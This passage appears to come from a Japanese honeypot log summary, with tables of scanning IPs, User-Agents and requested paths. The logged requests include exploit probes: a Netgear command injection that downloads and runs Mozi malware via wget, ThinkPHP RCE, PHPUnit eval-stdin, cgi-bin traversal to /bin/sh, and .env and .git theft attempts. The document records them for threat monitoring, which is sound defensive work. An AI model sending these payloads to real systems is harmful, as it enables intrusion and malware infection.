1	213.5.130.61	France
10	213.109.202.66	United Kingdom
1	216.218.206.68	United States
1	221.154.57.175	South Korea

UserAgent一覧

件数	UserAgent
28	`-`
4	`FooBarTest`
14	`Go-http-client/1.1`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr`
4	`Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0`
31	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (l9scan/2.0.4333e26363e2534313e2233313; +https[:]//leakix[.]net)`
4	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
2		`\x03`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\x07\x01`
21		`\x16\x03\x01`
1	CONNECT	`www[.]naver[.]com:80`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
31	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?rest_route=/wp/v2/users/`	HTTP/1.1
1	GET	`/_all_dbs`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/about`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/bundle.js`	HTTP/1.1
3	GET	`/cdn-cgi/trace`	HTTP/1.1
2	GET	`/config.json`	HTTP/1.1
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/image/lgbg.jpg`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/login.rsp`	HTTP/1.1
1	GET	`/s/4333e26363e2534313e2233313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties`	HTTP/1.1
2	GET	`/server-status`	HTTP/1.1
1	GET	`/skin/default_1/images/logo.png`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
4	GET	`http[:]//test[.]getproxylist[.]com/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/api`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/goform/formJsonAjaxReq`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.58.113.24	Germany
1	18.218.236.247	United States
1	20.55.53.144	United States
1	38.68.52.113	United States
2	45.55.37.106	United States
1	45.56.108.128	United States
2	45.77.239.190	United States
1	45.79.172.21	United States
1	45.79.181.104	United States
1	45.79.181.179	United States
2	45.79.181.251	United States
1	45.84.122.8	Romania
1	45.88.90.145	Bulgaria
1	45.128.232.62	Bulgaria
2	47.236.21.240	United States
18	51.79.29.48	Canada
9	54.37.79.75	France
1	60.191.125.35	China
1	65.49.1.41	United States
1	65.49.1.44	United States
1	66.175.213.4	United States
1	80.66.88.204	Russia
1	87.251.64.11	Russia
1	89.56.169.117	Germany
1	92.118.39.26	Romania
2	109.237.98.235	Russia
1	120.85.113.168	China
1	120.85.115.110	China
13	132.145.39.16	United States
2	140.99.170.212	United States
1	146.70.15.20	Romania
3	151.236.216.180	United States
4	152.32.250.69	Hong Kong
2	162.142.125.217	United States
2	162.142.125.226	United States
1	165.227.32.240	United States
2	167.94.138.51	United States
2	167.94.145.58	United States
1	172.104.11.4	United States
1	172.104.11.46	United States
2	172.105.128.11	United States
1	172.105.128.12	United States
2	178.128.115.233	United States
1	184.105.139.67	United States
1	185.180.143.50	Portugal
1	192.155.90.220	United States
1	192.241.205.18	United States
1	192.241.213.77	United States
1	193.233.21.25	Russia
1	198.98.57.169	United States
1	198.235.24.73	United States
1	198.235.24.152	United States
1	213.5.130.61	France
10	213.109.202.66	United Kingdom

UserAgent一覧

件数	UserAgent
46	`-`
1	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 4.1.2; GT-N8013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows; U; Windows NT 5.2;; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 Time/1688678695435`
32	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
4	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
2	`fasthttp`
1	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_13.67.44.234_80`
2		`\x03`
1		`\x16\x03\x01\x01\t\x01`
21		`\x16\x03\x01`
35	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/CdBhPcr26wK9IsNEftlazeoFpS6`	HTTP/1.1
1	GET	`/HNAP1/`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/public/info.php`	HTTP/1.1
1	GET	`/public/php.php`	HTTP/1.1
1	GET	`/public/phpinfo.php`	HTTP/1.1
1	GET	`/public/phpinfo`	HTTP/1.1
1	GET	`/public/test.php`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
2	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/test.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`http[:]//112[.]124[.]42[.]80:63435/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/goform/formJsonAjaxReq`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
4	PRI	`*`	HTTP/2.0